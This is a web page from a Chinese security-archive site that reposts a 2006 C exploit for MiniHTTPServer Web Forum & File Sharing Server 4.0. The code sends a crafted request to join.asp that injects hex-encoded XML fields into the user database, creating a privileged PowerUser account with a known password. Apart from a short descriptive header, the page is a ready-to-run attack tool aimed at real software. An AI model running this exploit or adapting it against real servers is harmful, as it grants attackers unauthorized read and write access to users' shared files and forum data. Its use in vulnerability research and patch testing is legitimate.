首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MiniHttpServer Web Forum & File Sharing Server 4.0 Add User Exploit
来源:vfocus.net 作者:Greg 发布时间:2006-10-28  

/*================================================================

MiniHTTPServer.NET 's Web Forum & File Sharing Server Power Pack 4
(latest version available for sale on their website
http://www.minihttpserver.net/bbs/index.php ) has multiple
vulnerabilities with their join.asp page a malicious person could send manipulated data
within the 'FrmMailBox' or 'FrmUserPass' field to add an unverified
account to the system's user database or to manipulate existing users.

This obviously could lead to information leaks on the server,
sensitive information disclosure, or even system access and
compromise.

Discovered 10-25-2006 by Greg Linares
Compiled in LCC-Win32

==================================================================*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32")

#define MAXBUF 1024

int main(int argc, char *argv[])
{
/* make sure this lowercase only username here is unique to the server - else exploit fails */

unsigned char ExploitStart[] =
"/join.asp?frmUserID=uniquerandomusername&frmUserPass=pwd1234&frmMailBox=me@blah.net";


unsigned char Exploit[] =
"\x3c\x2f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e\x3c"
"\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x31\x32\x33\x34"
"\x3c\x2f\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x3c"
"\x41\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e"
"\x50\x6f\x77\x65\x72\x55\x73\x65\x72\x3c\x2f\x41"
"\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e\x3c"
"\x45\x6d\x61\x69\x6c\x3e\x61\x40\x68\x65\x72\x65"
"\x2e\x6e\x65\x74";

WSADATA wsaData;
char *hostname;
struct hostent *hp;
int sockfd, bytes_read;
struct sockaddr_in sockin;
char buffer[MAXBUF];
char Exp[MAXBUF];

printf("\n=================================================================================\n");
printf("0-day MiniHTTPServer Web Forum & File Sharing Server 4.0 Add PowerUser Vulnerability \n");
printf("Proof Of Concept Code and Discovery by Greg Linares <GLinares.Code [At] GMail [Dot] Com\n");
printf("Exploits: invalid user-input on join.asp Membership Join Page\n");
printf("Adds a PowerUser - which has full read/write to Level Medium - Low Shares and Forum Editing\n");
printf("and still able to read all files on High Level shares.\n");
printf("Reported: Wednesday October 25th 2006\n");
printf("=================================================================================\n");

if ( argc != 3 )
{
printf("usage: %s <IP-addr or hostname> <username to add>\n", argv[0]);
exit(0);
}


hostname = argv[1];
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}

hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}

sockin.sin_family = AF_INET;
sockin.sin_port = htons(80);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}

if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}

printf("Connected to [%s] on port [80], sending overflow....\n\n\n",
hostname);

memset(Exp, 0, 1024);
strcat(Exp, ExploitStart);
/* you can add more \r to create blank lines in the userlist (harder to read) */
strcat(Exp, "\r");
strcat(Exp, "\x3c\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e");
strcat(Exp, strlwr(argv[2]));
strcat(Exp, Exploit);


memset(buffer, 0, 1024);
sprintf(buffer, "GET %s HTTP/1.0\n\n", Exp);
send(sockfd, buffer, strlen(buffer), 0);

/*
You can re-add this if you want to see the HTTP Response
do
{

bytes_read = recv(sockfd, buffer, sizeof(buffer), 0);
if ( bytes_read > 0 )
printf("%s", buffer);
}
while ( bytes_read > 0 );
*/

printf("Exploit Sent to [%s] \n Login with Username: %s (lowercase) \n Password: 1234\n", hostname, strlwr(argv[2]));
printf("Any Questions/Comments/Concerns ==> GLinares.Code [at] Gmail [dot] com\n");
WSACleanup();
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Php League <= 0.81 (config.
·MS Internet Explorer 7 Popup A
·AlstraSoft E-Friends <= 4.8
·N/X WCMS <= 4.1 (nxheader.i
·Zix Forum <= 1.12 (RepId) R
·Light Blog Remote Multiple Vul
·Site@School <= 2.4.02 Advis
·MS Windows NAT Helper Componen
·PHP DocWriter <= 0.3 (scrip
·Netref 4 (cat_for_aff.php) Sou
·Limbo CMS <= 1.0.4.2L (com_
·MS Windows (Windows Kernel) Pr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved